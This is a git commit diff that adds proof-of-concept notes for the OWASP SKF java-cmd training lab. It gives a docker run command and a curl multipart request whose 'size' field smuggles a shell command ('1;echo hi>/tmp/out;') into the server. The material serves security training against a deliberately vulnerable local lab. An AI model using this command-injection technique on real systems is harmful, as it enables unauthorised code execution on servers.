Update proof.md
This commit is contained in:
Sander Hautvast
GitHub
parent
f6ebb5614b
commit
f026fed1d2
1 changed files with 12 additions and 0 deletions
|
|
@ -14,3 +14,15 @@ curl 'http://localhost:5000/update' \
|
||||||
-H 'Cookie: JSESSIONID=DA8353D048C3C8B90D33596A10B2B360' \
|
-H 'Cookie: JSESSIONID=DA8353D048C3C8B90D33596A10B2B360' \
|
||||||
--data-raw 'color=yellow2'
|
--data-raw 'color=yellow2'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## ## blabla1337/owasp-skf-lab:java-cmd
|
||||||
|
|
||||||
|
docker run -p5000:5000 blabla1337/owasp-skf-lab:java-cmd
|
||||||
|
|
||||||
|
drop malicious payload in remote filesystem
|
||||||
|
```bash
|
||||||
|
curl 'http://localhost:5000/home' \
|
||||||
|
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \
|
||||||
|
--data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \
|
||||||
|
--compressed
|
||||||
|
```
|
||||||
|
|
|
||||||
Loading…
Add table
Reference in a new issue